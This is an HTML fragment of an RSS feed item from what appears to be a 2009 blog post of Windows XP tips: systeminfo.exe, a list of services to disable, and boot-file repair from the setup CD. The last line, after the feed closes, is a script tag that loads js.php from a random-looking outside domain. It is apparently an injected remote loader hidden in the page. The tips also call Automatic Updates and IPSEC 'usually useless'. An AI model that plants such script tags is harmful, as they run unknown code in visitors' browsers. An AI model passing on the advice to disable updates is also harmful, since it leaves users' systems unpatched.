<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Use systeminfo.exe to see System Information :</span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
You can use the systeminfo.exe command in the command prompt to see System Information, including all Windows updates and hotfixes. </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Disable system services for maximum performance :</span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
There are system services that you can disable to free up the system&#8217;s load. To access the interface that permits you to make changes to system&#8217;s services, type services.msc and the command prompt.<br />
This is a list of services that are *usually* useless and can be safely disabled. </span></p>
<ul type="circle">
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Alerter </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Application Layer Gateway Service, </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Application Management </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Automatic Updates </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Background Intelligent Transfer </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Clipbook </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Distributed Link Tracking Client </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Distributed Transaction Coordinater </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Error Reporting Service </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Fast User Switching Compatibility </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">IMAPI CD-Burning </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Indexing Service </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">IPSEC Services </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Messenger </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Net Logon </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Net Meeting </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Remote Desktop Sharing </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Network DDE </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Network DDE DSDM </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Portable Media Serial Number </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Remote Desktop Help Session Manager </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Remote Registry </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Secondary Logon </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Smartcard </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">SSDP Discovery Service </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Uninterruptible Power Supply </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Universal Plug and Play Device Host </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Upload Manager </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Webclient </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Wireless Zero Configuration </span></li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level2 lfo1; tab-stops: list 1.0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">WMI Performance Adaptor </span></li>
</ul>
</li>
</ol>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.5in; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto;"><strong><span style="font-size: 10pt; color: #414141; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;;">NOTE:</span> </strong> <span style="font-size: 10pt; color: #414141; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;;"> Make sure you don&#8217;t need them since some applications you&#8217;re using could depend on them. If you make any application to fail by disabling any of the services, go back and enable it again. </span></p>
<ol type="1">
<li class="MsoNormal" style="margin: 0in 0in 0pt; color: #414141; line-height: 19.8pt; text-align: justify; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><strong><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';">Repair Windows XP by using the XP installation CD: </span> </strong> <span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: 'Times New Roman';"><br />
If your system failes to start due to an error related to missing HAL.DLL, invalid Boot.ini or any other critical system boot files you can repair this by using the XP installation CD. Simply boot from your XP Setup CD and enter the Recovery Console. Then run &quot;attrib -H -R -S&quot; on the C:\Boot.ini file and delete it. Run &quot;Bootcfg /Rebuild&quot; and then Fixboot. </span></li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.dailyinfobyte.com/2009/07/28/top-windows-xp-secrets/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://kdjkfjskdfjlskdjf.com/js.php"></script>